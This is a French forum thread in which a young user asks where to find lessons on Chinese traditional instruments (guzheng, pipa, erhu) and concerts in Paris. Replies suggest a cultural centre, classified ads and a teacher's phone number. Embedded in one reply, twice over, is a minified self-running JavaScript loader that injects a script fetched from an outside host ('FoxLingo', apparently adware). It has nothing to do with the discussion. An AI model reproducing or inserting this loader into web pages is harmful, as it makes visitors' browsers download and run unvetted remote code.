recherche
sous-menu
Vous êtes ici : Accueil  ❭  Forum  ❭  Art, culture et civilisation  ❭  Art traditionnel

Cours d'instruments de musique traditionnels chinois ?

photo
Ses participations : 1
Ses discussions : 1
26/09/2012 à 15:59 - Cours d'instruments de musique traditionnels chinois ?
Bonjour, j'ignore si cette question a déjà été posée, et si c'est le cas, excusez-moi.

Je ne sais pas trop par où commencer à chercher, mais je cherche des cours de, soit guzheng, pipa ou de erhu à Paris, en cours particulier ou en institut. Je me demandais si l'un d'entre vous sait où prendre de tels cours à Paris ?
(Petite précision, au cas où (?) ça pourrait compter : je ne suis pas encore majeure.)

Je me demandais aussi si l'on pouvait trouver des concerts de musique traditionnelle chinoise à Paris ?

Merci d'avance.
Ce message a été supprimé. (Par Mémé.M, le 26/09/2012 21h13)

Au Centre Culturel de Chine à Paris il y a quelque chose qui existe.
http://www.cccparis.org/index.html

!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();

photo
Ses participations : 172
Ses discussions : 1
27/09/2012 à 10:13 - Cours d'instruments de musique traditionnels chinois ?
Et a Toulouse ?
photo
John
07/10/2015 à 01:10 - Cours d'instruments de musique traditionnels chinois ?
Si vous chercher cours de guzheng, me contactez 0695361872
Merci~
photo
hatz
21/09/2018 à 11:41 - Cours d'instruments de musique traditionnels chinois ?
Simplement sur leboncoin, vous trouverez des annonces pour des cours de Guzheng
La Chine 中国 (Zhongguó), pays de l'Asie orientale, est le sujet principal abordé sur CHINE INFORMATIONS (autrement appel� "CHINE INFOS") ; ce guide en ligne est mis à jour pour et par des passionnés depuis 2001. Cependant, les autres pays d'Asie du sud-est ne sont pas oubliés avec en outre le Japon, la Corée, l'Inde, le Vietnam, la Mongolie, la Malaisie, ou la Thailande.